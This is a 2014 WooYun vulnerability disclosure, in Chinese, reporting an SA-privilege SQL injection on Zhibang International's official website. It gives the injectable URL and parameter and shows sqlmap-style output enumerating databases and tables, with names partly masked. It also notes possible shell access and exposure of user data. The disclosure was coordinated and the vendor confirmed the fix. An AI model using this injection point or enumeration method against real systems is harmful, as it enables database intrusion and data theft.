漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-039776
漏洞标题:智邦国际官网主站SA权限SQL注入漏洞
相关厂商:北京智邦国际软件技术有限公司
漏洞作者: 爱上襄阳
提交时间:2014-09-09 19:20
修复时间:2014-10-24 19:22
公开时间:2014-10-24 19:22
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:17
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-09: 细节已通知厂商并且等待厂商处理中
2014-09-10: 厂商已经确认,细节仅向厂商公开
2014-09-20: 细节向核心白帽子及相关领域专家公开
2014-09-30: 细节向普通白帽子公开
2014-10-10: 细节向实习白帽子公开
2014-10-24: 细节向公众公开
简要描述:
智邦ERP官网主站SA权限SQL注入漏洞
详细说明:
注入点,SA权限,跨库
威胁:
1、若暴到物理路径能直接getshell
2、跑到了SA密码,同时外网还开了1433端口,若解密出来,也直接对数据库进行操作。
3、读到了表不少·看里面有订单,用户信息。
http://www.zbintel.com/knowledge/knowledge_2.asp?A2=17
retrieved: SA
current user: 'SA'
available databases [11]:
[*] BA***k
[*] c***
[*] master
[*] m***l
[*] M***s
[*] m***
[*] N***d
[*] p***s
[*] te***b
[*] w***k
[*] zbi***lp
atabase: work
[418 tables]
+------------------------------+
| dbo.G***on |
| dbo.M_***ig |
| dbo.M***on |
| dbo.Me***ss |
| dbo.Me***v |
| dbo.S***ion |
| dbo.S***Log |
| dbo.[email_Send_Queue_错误] |
| dbo.[email_book_zh_非杂志] |
| dbo.a***_zt |
| dbo.a_***t |
| dbo.a***s |
| dbo.ac*** |
| dbo.ac***l |
| dbo.ac***c |
| dbo.ac***t |
| dbo.ac***ht |
| dbo.ac***lt |
| dbo.ac***l |
| dbo.ac***zl_all |
| dbo.ac***_wc |
| dbo.ac***d |
| dbo.ac***te |
| dbo.ac***l |
| dbo.a*** |
| dbo.a*** |
| dbo.al***d |
| dbo.ar***st |
| dbo.au***st |
| dbo.a***d |
| dbo.b*** |
| dbo.b***n |
| dbo.b***ve |
| dbo.***s |
| dbo.b***son |
| dbo.b***y |
| dbo.b***ply2 |
| dbo.c*** |
| dbo.ca***e |
| dbo.c***et |
| dbo.c*** |
| dbo.ch*** |
| dbo.***|
|
漏洞证明:
retrieved: SA
current user: 'SA'
available databases [11]:
[*] BA***k
[*] c***
[*] master
[*] m***l
[*] M***s
[*] m***
[*] N***d
[*] p***s
[*] te***b
[*] w***k
[*] zbi***lp
修复方案:
过滤
版权声明:转载请注明来源 爱上襄阳@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2014-09-10 16:51
厂商回复:
厂商已处理
最新状态:
暂无